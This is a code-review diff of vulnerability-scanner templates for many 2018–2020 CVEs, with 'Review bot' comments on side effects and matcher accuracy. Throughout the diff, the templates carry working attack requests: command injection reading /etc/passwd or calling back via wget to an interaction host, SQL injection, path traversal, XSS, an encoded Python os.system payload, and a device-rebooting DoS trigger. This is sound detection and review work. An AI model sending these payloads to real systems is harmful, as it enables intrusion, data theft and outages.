31ab970f95..9f8c759dfc 100644 --- a/cves/2018/CVE-2018-16167.yaml +++ b/cves/2018/CVE-2018-16167.yaml @@ -15,10 +15,6 @@ requests: - | POST /upload HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index b59d969f15..d04aa76fc8 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -15,7 +15,6 @@ requests: - | GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 matchers-condition: and matchers: diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index fbcb014f26..433bc92b78 100644 --- a/cves/2018/CVE-2018-17254.yaml 
+++ b/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,6 @@ requests: - | GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Referer: {{BaseURL}} matchers: diff --git a/cves/2018/CVE-2018-18778.yaml b/cves/2018/CVE-2018-18778.yaml index e6423cda4b..51fa08f10d 100644 --- a/cves/2018/CVE-2018-18778.yaml +++ b/cves/2018/CVE-2018-18778.yaml @@ -13,7 +13,6 @@ requests: - |+ GET /etc/passwd HTTP/1.1 Host: - Content-Length: 4 unsafe: true matchers-condition: and @@ -21,6 +20,7 @@ requests: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index d5b0522d34..49b4dc9d42 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml @@ -19,13 +19,10 @@ requests: - | GET /assets/file:%2f%2f/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 - | GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 extractors: - type: regex diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index a92638e44f..9aff058ee4 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml 
@@ -12,13 +12,10 @@ requests: - | POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json Referer: {{Hostname}}/user/register X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 - Content-Length: 626 - Connection: close -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index bb3a606f79..7341f180dd 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -14,11 +14,6 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Authorization: Digest username=admin matchers-condition: and diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index 6943ee9c04..cb37d90548 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -16,14 +16,7 @@ requests: - | POST /timesheet/login.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Content-Length: 91 - DNT: 1 - Connection: keep-alive - Upgrade-Insecure-Requests: 1 username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login @@ -32,6 +25,7 @@ requests: - type: status status: - 200 + - type: word words: - '>' diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 3d64ab75f5..2053f87579 100644 
--- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -22,7 +22,6 @@ requests: - | POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/x-www-form-urlencoded yuzo_related_post_css_and_style= @@ -30,8 +29,6 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Upgrade-Insecure-Requests: 1 req-condition: true matchers-condition: and diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 7569402a99..14ca50d4c4 100644 --- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -17,8 +17,6 @@ requests: GET /wan.htm HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) matchers-condition: and matchers: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 2229b3f142..9d736b993d 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -13,14 +13,9 @@ requests: - | POST /password_change.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Referer: https://{{Hostname}}/ + Referer: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - Content-Length: 73 - Connection: close - Upgrade-Insecure-Requests: 1 user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index 4628e2aa48..21efd21490 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml 
@@ -12,9 +12,6 @@ requests: - | POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Content-Length: 1 - Connection: close echo echo
diff --git a/cves/2019/CVE-2019-16920.yaml b/cves/2019/CVE-2019-16920.yaml
index 5548784290..2ac46ac67b 100644
--- a/cves/2019/CVE-2019-16920.yaml
+++ b/cves/2019/CVE-2019-16920.yaml
@@ -13,41 +13,27 @@ requests: - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/ - Upgrade-Insecure-Requests: 1 + Referer: {{BaseURL}} html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384 - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('cat /etc/passwd')}} - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded - Connection: close - Referer: http://{{Hostname}}/login_pic.asp + Referer: {{BaseURL}}/login_pic.asp Cookie: uid=1234123 - Upgrade-Insecure-Requests: 1 html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a{{url_encode('type C:\\Windows\\win.ini')}} + matchers-condition: and matchers: - type: regex @@ -55,6 +41,7 @@ requests: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or + part: body - type: status status: 
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml index 951533f8d8..d25a72cee2 100644 --- a/cves/2019/CVE-2019-17382.yaml +++ b/cves/2019/CVE-2019-17382.yaml @@ -13,7 +13,6 @@ requests: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0 Accept-Language: en-US,en;q=0.9 payloads: diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index 4293fed10d..b7c1855604 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -11,14 +11,11 @@ requests: - | GET /solr/admin/cores?wt=json HTTP/1.1 Host: {{Hostname}} - Accept-Language: en - Connection: close - | POST /solr/{{core}}/config HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 259 { "update-queryresponsewriter": { diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml index 7a4d6d2413..1d87fb5936 100644 --- a/cves/2019/CVE-2019-2616.yaml +++ b/cves/2019/CVE-2019-2616.yaml @@ -16,7 +16,6 @@ requests: POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Length: 76 Content-Type: text/xml; charset=UTF-8 diff --git a/cves/2019/CVE-2019-3396.yaml b/cves/2019/CVE-2019-3396.yaml index 48af892d4f..dd385d5b7f 100644 --- a/cves/2019/CVE-2019-3396.yaml +++ b/cves/2019/CVE-2019-3396.yaml @@ -12,12 +12,7 @@ requests: - | POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: {{Hostname}} - Accept: */* - Accept-Language: en-US,en;q=0.5 - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Referer: {{Hostname}} - Content-Length: 168 - Connection: close {"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} 
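Review bot: The second CVE-2019-17558 request, `POST /solr/{{core}}/config` with an `update-queryresponsewriter` body, goes through Solr's Config API, so whatever writer configuration it installs persists on the target core after the scan, and nothing in the hunk reverts it. At minimum `info.description` (outside the hunk) should say so, e.g. `Note: this check writes an update-queryresponsewriter entry to the target core's config overlay and does not restore it`; restoring it would need a follow-up request using the corresponding delete operation, which I'd want to confirm against the full body since it is cut off at the hunk boundary.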
@@ -26,6 +21,7 @@ requests: - type: status status: - 200 + - type: word words: - "contextConfigLocation" diff --git a/cves/2019/CVE-2019-6715.yaml b/cves/2019/CVE-2019-6715.yaml index 343ea0316b..e004b0f931 100644 --- a/cves/2019/CVE-2019-6715.yaml +++ b/cves/2019/CVE-2019-6715.yaml @@ -12,11 +12,7 @@ requests: - | PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 Host: {{Hostname}} - Accept: */* - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 - Content-Length: 124 Content-Type: application/x-www-form-urlencoded - Connection: close {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml index 660516cef2..a236e9b923 100644 --- a/cves/2019/CVE-2019-7256.yaml +++ b/cves/2019/CVE-2019-7256.yaml @@ -11,31 +11,21 @@ info: tags: cve,cve2019,emerge,rce requests: - - raw: # Default Port + - raw: - | GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 + - | GET /nuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - DNT: 1 - Connection: close - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml index d2fd2f0946..97c3a627c3 100644 --- a/cves/2019/CVE-2019-7609.yaml +++ b/cves/2019/CVE-2019-7609.yaml 
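Review bot: The first CVE-2019-7256 request writes `/etc/passwd` into `nuclei.txt` in the web root (`%60cat%20/etc/passwd%20%3E%20nuclei.txt%60`) and the second reads it back, but nothing removes the file, so every matched target is left serving its password file at a guessable URL to anyone. A third request through the same injection, `GET /card_scan.php?No=30&ReaderNo=%60rm%20nuclei.txt%60 HTTP/1.1` with the `Host: {{Hostname}}` line, would clean up; a random name (`{{randstr}}.txt` in both requests) would also stop concurrent scans from overwriting each other's file. The `info` block, where the side effect should be mentioned, is outside the hunk.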
@@ -10,31 +10,27 @@ info: - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077 tags: cve,cve2019,kibana,rce - # Kibana versions before 5.6.15 and 6.6.1 - # contain an arbitrary code execution flaw in the Timelion visualizer. - # An attacker with access to the Timelion application could send a request - # that will attempt to execute javascript code. - # This could possibly lead to an attacker executing arbitrary commands - # with permissions of the Kibana process on the host system. - requests: - method: POST path: - "{{BaseURL}}/api/timelion/run" headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" Content-Type: "application/json; charset=utf-8" - body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}" + + body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}' + matchers-condition: and matchers: - type: word words: - "seriesList" part: body + - type: word words: - - "Content-Type: application/json" + - "application/json" part: header + - type: status status: - 200 \ No newline at end of file diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index fcb6483f59..059f75bb43 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml 
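Review bot: The body `.es(*)` is an ordinary Timelion expression, so a `seriesList` reply with status 200 only shows that `/api/timelion/run` answers without authentication, not that the "arbitrary code execution flaw in the Timelion visualizer" the deleted comment described is present; the matchers will fire on patched Kibana just the same, so the template should present itself as an exposure indicator or gain a version condition rather than imply exploitation. The deleted comment block also carried the affected-version information (before 5.6.15 and 6.6.1); that belongs in `info.description` rather than being dropped. Loosening the header matcher from `Content-Type: application/json` to `application/json` is harmless under `matchers-condition: and` but gains nothing.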
@@ -12,7 +12,6 @@ requests: - | POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Content-Type: application/xml /usr/local/netsweeper/webadmin/out + # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5" - "{{BaseURL}}/webadmin/out" headers: - Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php" - User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)" - Connection: "close" + Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php" + matchers-condition: and matchers: - type: word words: - "nonexistent" part: body + - type: status status: - 200 diff --git a/cves/2020/CVE-2020-15568.yaml b/cves/2020/CVE-2020-15568.yaml index c9408d639e..4a4140cb1c 100644 --- a/cves/2020/CVE-2020-15568.yaml +++ b/cves/2020/CVE-2020-15568.yaml @@ -13,13 +13,11 @@ requests: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded - | GET /include/nuclei.txt HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cves/2020/CVE-2020-16139.yaml b/cves/2020/CVE-2020-16139.yaml index 5ba27f8bc5..12f3ac20ab 100644 --- a/cves/2020/CVE-2020-16139.yaml +++ b/cves/2020/CVE-2020-16139.yaml 
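Review bot: As with the eMerge template in this commit, the first CVE-2020-15568 request redirects `cat /etc/passwd` into `nuclei.txt` under `/include/` and the second fetches it, leaving the file readable on the target afterwards. A follow-up request that removes it through the same `_exec` path (`opt=(rm%20nuclei.txt)` in place of the `cat` expression) or, failing that, a warning in `info` about the artifact should accompany the check, and `{{randstr}}.txt` would avoid collisions between concurrent scans.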
@@ -14,7 +14,6 @@ requests: - | POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 matchers-condition: and matchers: diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml index 3f0e6b6d93..c98ea1fe16 100644 --- a/cves/2020/CVE-2020-17505.yaml +++ b/cves/2020/CVE-2020-17505.yaml @@ -13,16 +13,12 @@ requests: - | GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close - | GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close cookie-reuse: true matchers-condition: and @@ -33,6 +29,7 @@ requests: - "Position: ||whoami||" - "root" condition: and + part: body - type: status status: diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index c0d3c87ab1..8e59416072 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -16,9 +16,7 @@ requests: POST /jars/upload HTTP/1.1 Host: {{Hostname}} Accept: */* - Accept-Language: en Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y - Content-Length: 187 ------WebKitFormBoundaryoZ8meKnrrso89R6Y Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index db823bc245..13d8570a5b 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml 
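Review bot: CVE-2020-16139 is a denial-of-service issue on the Cisco 7937G, and the request here (`func=609&rphl=1&data=AAAA…`) appears to be the reboot trigger the advisory describes, so a positive match means the phone has been made to crash or reboot; the template is destructive, yet nothing in the hunk marks it as such. The `info` block (outside the hunk) should carry a `dos` tag and a description stating that the device reboots, so that default runs exclude it. Whether the matchers observe the reboot directly or only the response to the oversized parameter is not visible here.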
@@ -14,25 +14,14 @@ requests: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} - Content-Length: 745 - Accept: */* X-Requested-With: XMLHttpRequest - sec-ch-ua-mobile: ?0 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak Origin: {{BaseURL}} - Sec-Fetch-Site: same-origin - Sec-Fetch-Mode: cors - Sec-Fetch-Dest: empty Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close ------WebKitFormBoundary88AhjLimsDMHU1Ak Content-Disposition: form-data; name="action" diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 5f354d7712..24b6fd03d9 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml 
@@ -13,34 +13,21 @@ requests: - | # Response:Location: /page/login/login_fail.html POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - DNT: 1 - Connection: close Cookie: uid=6gPjT2ipmNz - Upgrade-Insecure-Requests: 1 - Content-Length: 0 username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 - DNT: 1 - Connection: close Cookie: uid=6gPjT2ipmNz - Upgrade-Insecure-Requests: 1 - Content-Length: 0 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "nobody:[x*]:65534:65534" diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 88ec587026..f2553035ef 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -19,9 +19,7 @@ requests: POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Content-Length: 608 Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 - Connection: close --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index 10a508915e..d2352c64ac 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml 
@@ -15,18 +15,14 @@ requests: - | POST /cgi-bin/system_mgr.cgi? HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close matchers: - type: word diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index 8381e16ece..b9efcf09b6 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -15,9 +15,7 @@ requests: - | POST /login.htm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* - Connection: close submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd= diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index a4d926f2a5..e511013c53 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -16,17 +16,10 @@ requests: - | GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive + - | GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive matchers: - type: word diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index eb7d3e6d13..e320eb589c 100644 --- a/cves/2020/CVE-2020-28208.yaml 
+++ b/cves/2020/CVE-2020-28208.yaml @@ -14,10 +14,7 @@ requests: POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - X-Requested-With: XMLHttpRequest Content-Type: application/json - User-Agent: Ophion SecurityGroup - Accept-Language: en-US,en;q=0.9 {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"} diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index d65d7e96c6..a5e9540ba2 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -13,12 +13,9 @@ requests: - | POST /goform/setSysAdm HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept-Encoding: gzip, deflate Accept: */* - Connection: keep-alive - Origin: http://{{Hostname}} - Referer: http://{{Hostname}}/login.shtml + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login.shtml admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 diff --git a/cves/2020/CVE-2020-3580.yaml b/cves/2020/CVE-2020-3580.yaml index cf3a2d1395..af6da1dcfa 100644 --- a/cves/2020/CVE-2020-3580.yaml +++ b/cves/2020/CVE-2020-3580.yaml @@ -17,7 +17,6 @@ requests: POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Content-Length: 44 SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E diff --git 